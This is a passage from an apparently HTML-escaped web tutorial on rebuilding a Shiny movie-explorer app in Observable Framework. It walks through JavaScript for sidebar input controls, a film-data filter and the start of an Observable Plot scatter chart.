&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; gy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;150&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; getGrey &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; opacity =&amp;gt; &lt;span style="color:#a5d6ff"&gt;`rgba(&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;gy&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;,&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;gy&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;,&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;gy&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;,&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;opacity&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;)`&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Create function for converting a Boolean value to a text label
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; getWonOscarText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; bool =&amp;gt; bool &lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Won Oscar(s)&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Didn\&amp;#39;t Win an Oscar&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// Create an array of objects that can be used to map between data properties
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// and their more human-friendly labels and vice-versa
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; axisVariables &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Tomatometer&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Meter&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Numeric Rating&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Rating&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Number of Reviews&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Reviews&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Box-office revenue ($million)&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;BoxOffice&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Year&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Released&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {name&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Length (minutes)&amp;#39;&lt;/span&gt;, prop&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Runtime&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;];
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the third block we finally start to build the user interface, adding all the controls for our sidebar. This is the point where we start utilising the power of Framework through the in-built &lt;code&gt;view&lt;/code&gt; function and &lt;code&gt;Inputs&lt;/code&gt; object.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In Observable, a view is a user interface element that directly controls a value in the notebook. A view consists of two parts:&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;The view, which is typically an interactive DOM element […].&lt;/li&gt;
&lt;li&gt;The value, which is any JavaScript value.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;For the &lt;code&gt;Inputs&lt;/code&gt; methods, the first argument typically represents the allowed values for the control and the second argument provides additional options as an object. The order of the declarations determines the order in which the corresponding UI elements appear in the HTML and thus their top-to-bottom ordering in the sidebar panel. We change the order here from the original Shiny example to something that seems a bit more logical. Specifically, the select menus for choosing the two axes are moved from the bottom of the controls to the top.&lt;/p&gt;
&lt;div class="resizable"&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; xVariable &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.select(axisVariables, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;X-axis Variable&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; format&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; d =&amp;gt; d.name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; axisVariables.find((d) =&amp;gt; d.prop &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Meter&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; yVariable &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.select(axisVariables, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Y-axis Variable&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; format&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; d =&amp;gt; d.name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; axisVariables.find((d) =&amp;gt; d.prop &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Reviews&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; reviewsMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.range(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;300&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Minimum number of reviews on Rotten Tomatoes&amp;#39;&lt;/span&gt;, step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;80&lt;/span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; yearMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.number(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yearExtent,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Earliest release year&amp;#39;&lt;/span&gt;, step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1970&lt;/span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; yearMax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.number(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yearExtent,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Latest release year&amp;#39;&lt;/span&gt;, step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; yearExtent[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;] }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; dollarsMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.number(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Minimum box-office revenue ($million)&amp;#39;&lt;/span&gt;, step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; dollarsMax &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.number(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Maximum box-office revenue ($million)&amp;#39;&lt;/span&gt;, step&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;800&lt;/span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; oscarsMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.radio(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; { label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Minimum number of Oscars won&amp;#39;&lt;/span&gt;, value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; selectedGenre &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.select([&lt;span style="color:#a5d6ff"&gt;&amp;#39;All&amp;#39;&lt;/span&gt;].concat(genres), {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Genre&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;All&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; directorText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.text({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Director name contains&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; castText &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; view(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Inputs.text({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Cast contains&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Inside a block in which a variable (or &lt;code&gt;const&lt;/code&gt;) is declared using &lt;code&gt;view&lt;/code&gt;, that variable will be an object representing that view. In other code blocks, however, that variable name can be used to directly retrieve the value associated with that view: there&amp;rsquo;s no requirement to de-reference the object. This can help make code look a lot nicer but can also be confusing. For instance, a &lt;code&gt;view&lt;/code&gt; can be declared as a &lt;code&gt;const&lt;/code&gt; (it is an object whose properties are still mutable) but the value of the variable with the same name changes in other blocks.&lt;/p&gt;
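&lt;p&gt;The idea that a &lt;code&gt;const&lt;/code&gt; can still appear to change can be modelled in plain JavaScript. The sketch below is not how Framework implements &lt;code&gt;view&lt;/code&gt;; it only assumes a view is an object that holds a value and fires an &lt;code&gt;input&lt;/code&gt; event when that value changes. The names &lt;code&gt;makeFakeInput&lt;/code&gt; and &lt;code&gt;observeValues&lt;/code&gt; are hypothetical.&lt;/p&gt;

```javascript
// Hypothetical stand-in for a view: an element-like object that holds a
// value and can fire an 'input' event. Not the Framework implementation.
function makeFakeInput(initialValue) {
  const element = new EventTarget();
  element.value = initialValue;
  return element;
}

// Hypothetical helper: record each value the fake view takes over time,
// roughly as code in other blocks would see it.
function observeValues(element) {
  const seen = [element.value];
  element.addEventListener('input', function () {
    seen.push(element.value);
  });
  return seen;
}

// The binding is const, so it always refers to the same object...
const reviewsMinInput = makeFakeInput(80);
const seenValues = observeValues(reviewsMinInput);

// ...but the value stored on that object is free to change.
reviewsMinInput.value = 120;
reviewsMinInput.dispatchEvent(new Event('input'));

console.log(seenValues); // [ 80, 120 ]
```

&lt;p&gt;Under these assumptions the object never changes identity, yet anything that reads its current value sees 80 first and 120 after the event.&lt;/p&gt;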
&lt;p&gt;You may also notice that minimum and maximum values are set with separate controls rather than a single two-handled slider. This is because, despite the name, browser-native range inputs only support a single handle.&lt;/p&gt;
&lt;p&gt;Our page now has a title and our controls, plus a footer we&amp;rsquo;ll get rid of later.&lt;/p&gt;
&lt;picture&gt;
&lt;source srcset="assets/ui.webp 1x, assets/ui@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/ui.png" class="screenshot" alt=""&gt;
&lt;/picture&gt;
&lt;code class="switch"&gt;
git switch --detach ui
&lt;/code&gt;
&lt;h3 id="building-the-graphic"&gt;Building the Graphic&lt;/h3&gt;
&lt;p&gt;We then add a block to process our data based on the values of our inputs:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; movies.filter(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(d) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; d.Reviews &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; reviewsMin
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.Oscars &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; oscarsMin
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.YearReleased &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; yearMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.YearReleased &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; yearMax
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; (selectedGenre &lt;span style="color:#ff7b72;font-weight:bold"&gt;===&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;All&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; d.Genres.includes(selectedGenre))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.Director.includes(directorText.toLowerCase())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.Cast.includes(castText.toLowerCase())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.BoxOffice &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; dollarsMin &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; d.BoxOffice &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; dollarsMax
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; );
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; xLabel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; xVariable.name;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; yLabel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; yVariable.name;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we can add the code to render our scatter chart using Observable Plot:&lt;/p&gt;
&lt;div class="resizable"&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Plot.plot({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;,
